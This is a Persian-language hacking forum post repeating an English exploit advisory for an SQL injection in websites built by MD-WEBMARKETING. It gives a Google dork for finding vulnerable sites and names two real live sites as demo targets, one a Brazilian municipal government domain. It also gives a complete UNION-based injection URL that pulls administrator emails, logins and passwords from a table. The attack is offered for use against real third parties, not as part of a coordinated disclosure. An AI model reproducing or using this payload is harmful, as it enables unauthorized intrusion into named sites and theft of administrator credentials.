انجمن تیم امنیتی ایران سایبر

Md-webmarketing - Sql Injection Vulnerability

شروع موضوع توسط Unkn0wn ‏13/1/20 در انجمن آسیب پذیری های کشف و گزارش شده

  1. لطفا فایل های خود را جهت ماندگاری در انجمن اپلود کنید در صورت مشاهده لینک اپلود خروجی , تاپیک حذف خواهد شد .
    بستن اطلاعیه
بستن اطلاعیه


درود مهمان گرامي؛

مهمان گرامي، براي مشاهده تالار با امکانات کامل ميبايست از طريق ايــن ليـــنک ثبت نام کنيد .

حامی مسابقات و برگزار کننده دوره های پیشرفته ارزیابی امنیت برای سازمان ها فتح پرچم (CTF)
  1. Unkn0wn
    کاربر فعال

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏30/5/18
    ارسال ها:
    112
    تشکر شده:
    592
    جنسیت:
    Name:
    Unknown
    Main os:
    Mac
    کد:
    ---------------------------------------------------------
    # Exploit Title: MD-WEBMARKETING - SQL Injection vulnerability
    # Google Dork: intext:"Desenvolvido por: MD-WEBMARKETING" inurl:.php?id=
    # Date: 2020-01-09
    # Exploit Author: Unkn0wn
    # Vendor Homepage: http://mdwebmarketing.com.br/
    # Software Link: -
    # Version: -
    # Tested on: Ubuntu
    # CVE : N/A
    ---------------------------------------------------------
    
    Demo:
    http://www.camaradeodapolis.ms.gov.br/exibe.php?id=117[SQL injection]
    http://amesccg.com.br/beneficios.php?tipo=2[SQL injection]
    
    
    http://amesccg.com.br/beneficios.php?tipo=-2+/*!50000Union*/+SeleCt+1,2,3,/*!50000Group_ConCat(email,0x3a,login,0x3a,senha)*/,5,6,7+From+administracao--+
    ----------------------------------------------------------
    # contact : [email protected]
    # Visit: https://t.me/l314XK205E
    # <UndergroundLife/> 2010 - 2020
    برای نمایش این قسمت باید وارد سیستم شوید یا اینکه ثبت نام نمایید
     
    blackops و Ruiner از این پست تشکر کرده اند.
بارگذاری...
به انجمن تخصصی امنیت ایران سایبر خوش آمدید . برای مشاهده تمامی تالار ها و امکانات ثبت نام کنید .